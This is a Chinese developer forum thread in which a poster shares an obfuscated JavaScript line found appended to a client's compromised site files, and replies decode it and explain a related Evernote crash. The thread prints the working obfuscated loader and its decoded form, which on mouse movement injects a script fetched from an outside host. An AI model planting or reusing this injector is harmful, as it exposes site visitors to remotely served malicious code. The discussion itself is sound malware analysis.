Ruby China

JavaScript 能让 evernote 客户端崩溃的 javascript 代码

匿名 · 2012年06月21日 · 最后由 tylerlong 回复于 2012年06月22日 · 3912 次阅读

今天帮一位国外的客户诊断网站木马问题,发现他的网站上有几个 js 文件的末尾被加入了如下的一行。结果通过浏览器访问的时候,我的电脑上的杀毒软件 (Microsoft Security Essentials) 会弹出窗口报发现木马。我把那一行代码从 js 文件移除之后,客户的问题就解决了。

可是后来我自己又发现了怪异的问题:打算把代码保存到 evernote 中,等有时间再研究。用的是电脑客户端版的 evernote, 新建了一篇 note, 结果刚粘帖进去那一行代码,evernote 就崩溃了!我想这 js 代码对 evernote 来讲不就是纯文本吗?难道 evernote 客户端还解析代码?于是认为是巧合。便把代码贴到编辑器中格式化了一下,evernote 弄好,新建 note, 再次粘帖,没事。就在我按 ctrl + s 保存的那一瞬间,evernote 又崩溃了!这个现象真的不好解释了。黑客就是牛,写了 js 木马,把不能解释 js 的程序都搞崩溃了。

贴代码如下,各位自担风险:

try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'om'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n="17$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$56$45.5$54$13$55.5$54$51$13$27.5$13$16.5$49$55$55$53$26$20.5$20.5$51.5$55$49$56$54$53$47$57.5$57.5$49.5$20$47$52.5$47.5$54.5$52$55$47.5$57$49.5$54.5$55$20$46.5$52.5$51.5$20.5$48.5$20.5$16.5$26.5$3.5$2$1.5$49.5$48$13$17$55$57.5$53$47.5$52.5$48$13$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$27.5$27.5$13$16.5$55.5$52$47$47.5$48$49.5$52$47.5$47$16.5$17.5$13$58.5$3.5$2$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$21$26.5$3.5$2$1.5$59.5$3.5$2$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$52.5$52$51.5$52.5$55.5$54.5$47.5$51.5$52.5$56$47.5$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$1.5$49.5$48$13$17$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$27.5$27.5$13$21$17.5$13$58.5$3.5$2$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$21.5$26.5$3.5$2$1.5$1.5$1.5$56$45.5$54$13$49$47.5$45.5$47$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$49$47.5$45.5$47$16.5$17.5$42.5$21$43.5$26.5$3.5$2$1.5$1.5$1.5$56$45.5$54$13$54.5$46.5$54$49.5$53$55$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55$17$16.5$54.5$46.5$54$49.5$53$55$16.5$17.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$55$57.5$53$47.5$13$27.5$13$16.5$55$47.5$57$55$20.5$50$45.5$56$45.5$54.5$46.5$54$49.5$53$55$16.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$52.5$52$54$47.5$45.5$47$57.5$54.5$55$45.5$55$47.5$46.5$49$45.5$52$48.5$47.5$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$13$17$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$49.5$48$13$17$55$49$49.5$54.5$20$54$47.5$45.5$47$57.5$38.5$55$45.5$55$47.5$13$27.5$27.5$13$16.5$46.5$52.5$51.5$53$51$47.5$55$47.5$16.5$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$22$26.5$3.5$2$1.5$1.5$1.5$1.5$59.5$3.5$2$1.5$1.5$1.5$59.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$52.5$52$51$52.5$45.5$47$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$22$26.5$3.5$2$1.5$1.5$1.5$59.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$54.5$54$46.5$13$27.5$13$55.5$54$51$13$18.5$13$35.5$45.5$55$49$20$54$45.5$52$47$52.5$51.5$17$17.5$20$55$52.5$38.5$55$54$49.5$52$48.5$17$17.5$20$54.5$55.5$46$54.5$55$54$49.5$52$48.5$17$22.5$17.5$13$18.5$13$16.5$20$50$54.5$16.5$26.5$3.5$2$1.5$1.5$1.5$49$47.5$45.5$47$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$54.5$46.5$54$49.5$53$55$17.5$26.5$3.5$2$1.5$1.5$59.5$3.5$2$1.5$59.5$26.5$3.5$2$59.5$17.5$17$17.5$26.5"[((e)?"s":"")+"p"+"lit"]("a$".substr(1));for(i=6-2-1-2-1;i-687!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));}q=ss;e(q);}

格式化之后的版本:

try{
    q=document.createElement("u");
    q.appendChild(q+"");
}catch(qw){
    h=-012/5;
    zz='a'+'l';
    f='fr'+'om'+'Ch';
    f+='arC';
}

try{
    qwe=prototype;
}catch(brebr){
    zz='zv'.substr(123-122)+zz;
    ss=[];
    f+=(h)?'ode':"";
    w=this;
    e=w[f.substr(11)+zz];

    n="17$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$56$45.5$54$13$55.5$54$51$13$27.5$13$16.5$49$55$55$53$26$20.5$20.5$51.5$55$49$56$54$53$47$57.5$57.5$49.5$20$47$52.5$47.5$54.5$52$55$47.5$57$49.5$54.5$55$20$46.5$52.5$51.5$20.5$48.5$20.5$16.5$26.5$3.5$2$1.5$49.5$48$13$17$55$57.5$53$47.5$52.5$48$13$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$27.5$27.5$13$16.5$55.5$52$47$47.5$48$49.5$52$47.5$47$16.5$17.5$13$58.5$3.5$2$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$21$26.5$3.5$2$1.5$59.5$3.5$2$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$52.5$52$51.5$52.5$55.5$54.5$47.5$51.5$52.5$56$47.5$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$1.5$49.5$48$13$17$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$27.5$27.5$13$21$17.5$13$58.5$3.5$2$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$21.5$26.5$3.5$2$1.5$1.5$1.5$56$45.5$54$13$49$47.5$45.5$47$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$49$47.5$45.5$47$16.5$17.5$42.5$21$43.5$26.5$3.5$2$1.5$1.5$1.5$56$45.5$54$13$54.5$46.5$54$49.5$53$55$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55$17$16.5$54.5$46.5$54$49.5$53$55$16.5$17.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$55$57.5$53$47.5$13$27.5$13$16.5$55$47.5$57$55$20.5$50$45.5$56$45.5$54.5$46.5$54$49.5$53$55$16.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$52.5$52$54$47.5$45.5$47$57.5$54.5$55$45.5$55$47.5$46.5$49$45.5$52$48.5$47.5$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$13$17$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$49.5$48$13$17$55$49$49.5$54.5$20$54$47.5$45.5$47$57.5$38.5$55$45.5$55$47.5$13$27.5$27.5$13$16.5$46.5$52.5$51.5$53$51$47.5$55$47.5$16.5$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$22$26.5$3.5$2$1.5$1.5$1.5$1.5$59.5$3.5$2$1.5$1.5$1.5$59.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$52.5$52$51$52.5$45.5$47$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$22$26.5$3.5$2$1.5$1.5$1.5$59.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$54.5$54$46.5$13$27.5$13$55.5$54$51$13$18.5$13$35.5$45.5$55$49$20$54$45.5$52$47$52.5$51.5$17$17.5$20$55$52.5$38.5$55$54$49.5$52$48.5$17$17.5$20$54.5$55.5$46$54.5$55$54$49.5$52$48.5$17$22.5$17.5$13$18.5$13$16.5$20$50$54.5$16.5$26.5$3.5$2$1.5$1.5$1.5$49$47.5$45.5$47$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$54.5$46.5$54$49.5$53$55$17.5$26.5$3.5$2$1.5$1.5$59.5$3.5$2$1.5$59.5$26.5$3.5$2$59.5$17.5$17$17.5$26.5"[((e)?"s":"")+"p"+"lit"]("a$".substr(1));

    for(i=6-2-1-2-1;i-687!=0;i++){
        k=i;
        ss=ss+String.fromCharCode(-1*h*(3+1*n[k]));
    }
    q=ss;
    e(q);
}
1 个赞
匿名 #1 2012年06月21日

初步诊断是我的杀毒软件 (MIcrosoft Security Essentials) 搞的鬼。它只要检测到那段代码,就把相应的文件删掉。evernote 的数据文件被删除了,当然就崩溃了。

lgn21st #2 2012年06月21日

这里用 Linux 和 Mac 的人不少,估计用 Mac 的人可能对杀毒软件都不太熟悉了。

yesmeck #3 2012年06月21日

就是給你插入一個 script 標簽,然後引用一個外部的 js 文件,好像也沒什麽特別的。。。

(function() {
    var url = 'http://mthvrpdyyi.doesntexist.com/g/';
    if (typeof window.xyzflag === 'undefined') {
        window.xyzflag = 0;
    }
    document.onmousemove = function() {
        if (window.xyzflag === 0) {
            window.xyzflag = 1;
            var head = document.getElementsByTagName('head')[0];
            var script = document.createElement('script');
            script.type = 'text/javascript';
            script.onreadystatechange = function() {
                if (this.readyState == 'complete') {
                    window.xyzflag = 2;
                }
            };
            script.onload = function() {
                window.xyzflag = 2;
            };
            script.src = url + Math.random().toString().substring(3) + '.js';
            head.appendChild(script);
        }
    };
})();
匿名 #4 2012年06月22日

楼上给出的代码是最终要执行的 js 代码。我简单分析了下,把代码执行的过程贴了出来,伪代码,仅供参考:

q = document.createElement("u");
h = -2;
zz = "al";
f = "fromCharC";

zz = "val";
ss = [];
f = "fromCharCode";
e = eval

s = "17$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$56$45.5$54$13$55.5$54$51$13$27.5$13$16.5$49$55$55$53$26$20.5$20.5$51.5$55$49$56$54$53$47$57.5$57.5$49.5$20$47$52.5$47.5$54.5$52$55$47.5$57$49.5$54.5$55$20$46.5$52.5$51.5$20.5$48.5$20.5$16.5$26.5$3.5$2$1.5$49.5$48$13$17$55$57.5$53$47.5$52.5$48$13$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$27.5$27.5$13$16.5$55.5$52$47$47.5$48$49.5$52$47.5$47$16.5$17.5$13$58.5$3.5$2$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$21$26.5$3.5$2$1.5$59.5$3.5$2$1.5$47$52.5$46.5$55.5$51.5$47.5$52$55$20$52.5$52$51.5$52.5$55.5$54.5$47.5$51.5$52.5$56$47.5$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$1.5$49.5$48$13$17$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$27.5$27.5$13$21$17.5$13$58.5$3.5$2$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$21.5$26.5$3.5$2$1.5$1.5$1.5$56$45.5$54$13$49$47.5$45.5$47$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$48.5$47.5$55$31.5$51$47.5$51.5$47.5$52$55$54.5$30$57.5$39$45.5$48.5$36$45.5$51.5$47.5$17$16.5$49$47.5$45.5$47$16.5$17.5$42.5$21$43.5$26.5$3.5$2$1.5$1.5$1.5$56$45.5$54$13$54.5$46.5$54$49.5$53$55$13$27.5$13$47$52.5$46.5$55.5$51.5$47.5$52$55$20$46.5$54$47.5$45.5$55$47.5$31.5$51$47.5$51.5$47.5$52$55$17$16.5$54.5$46.5$54$49.5$53$55$16.5$17.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$55$57.5$53$47.5$13$27.5$13$16.5$55$47.5$57$55$20.5$50$45.5$56$45.5$54.5$46.5$54$49.5$53$55$16.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$52.5$52$54$47.5$45.5$47$57.5$54.5$55$45.5$55$47.5$46.5$49$45.5$52$48.5$47.5$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$13$17$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$49.5$48$13$17$55$49$49.5$54.5$20$54$47.5$45.5$47$57.5$38.5$55$45.5$55$47.5$13$27.5$27.5$13$16.5$46.5$52.5$51.5$53$51$47.5$55$47.5$16.5$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$22$26.5$3.5$2$1.5$1.5$1.5$1.5$59.5$3.5$2$1.5$1.5$1.5$59.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$52.5$52$51$52.5$45.5$47$13$27.5$13$48$55.5$52$46.5$55$49.5$52.5$52$17$17.5$13$58.5$3.5$2$1.5$1.5$1.5$1.5$56.5$49.5$52$47$52.5$56.5$20$57$57.5$58$48$51$45.5$48.5$13$27.5$13$22$26.5$3.5$2$1.5$1.5$1.5$59.5$26.5$3.5$2$1.5$1.5$1.5$54.5$46.5$54$49.5$53$55$20$54.5$54$46.5$13$27.5$13$55.5$54$51$13$18.5$13$35.5$45.5$55$49$20$54$45.5$52$47$52.5$51.5$17$17.5$20$55$52.5$38.5$55$54$49.5$52$48.5$17$17.5$20$54.5$55.5$46$54.5$55$54$49.5$52$48.5$17$22.5$17.5$13$18.5$13$16.5$20$50$54.5$16.5$26.5$3.5$2$1.5$1.5$1.5$49$47.5$45.5$47$20$45.5$53$53$47.5$52$47$30.5$49$49.5$51$47$17$54.5$46.5$54$49.5$53$55$17.5$26.5$3.5$2$1.5$1.5$59.5$3.5$2$1.5$59.5$26.5$3.5$2$59.5$17.5$17$17.5$26.5"

n = s.split("$"); // return a array with 687 numbers

for(i=0;i-687!=0;i++){ //iterate those 687 numbers
    charCode = (i+3) * 2
    ss=ss+String.fromCharCode(charCode);
}

eval(ss);

最终被 eval 执行的代码 ss 也就是楼上贴出来的那段:

(function() {   
    var url = 'http://mthvrpdyyi.doesntexist.com/g/';   
    if (typeof window.xyzflag === 'undefined') {        
        window.xyzflag = 0; 
    }   
    document.onmousemove = function() {     
        if (window.xyzflag === 0) {         
            window.xyzflag = 1;         
            var head = document.getElementsByTagName('head')[0];            
            var script = document.createElement('script');          
            script.type = 'text/javascript';            
            script.onreadystatechange = function () {               
                if (this.readyState == 'complete') {                    
                    window.xyzflag = 2;             
                }           
            };          
            script.onload = function() {                
                window.xyzflag = 2;     
            };      
            script.src = url + Math.random().toString().substring(3) + '.js';           
            head.appendChild(script);       
        }   
    };
})();
匿名 #5 2012年06月22日

#2 楼 @lgn21st 像这种通过服务器端注入 js 脚本,通过浏览器执行的木马,我想 linux 和 mac 也无法免疫。只不过没有杀毒软件,没有报警而已。

匿名 #6 2012年06月22日

最终被插入页面的脚本地址格式:http://mthvrpdyyi.doesntexist.com/g/703457125462592.js, 其中数字是随机生成的:Math.random().toString().substring(3)

不过打开脚本链接发现内容为空。暂时不知道它想要做什么。

需要 登录 后方可回复, 如果你还没有账号请 注册新账号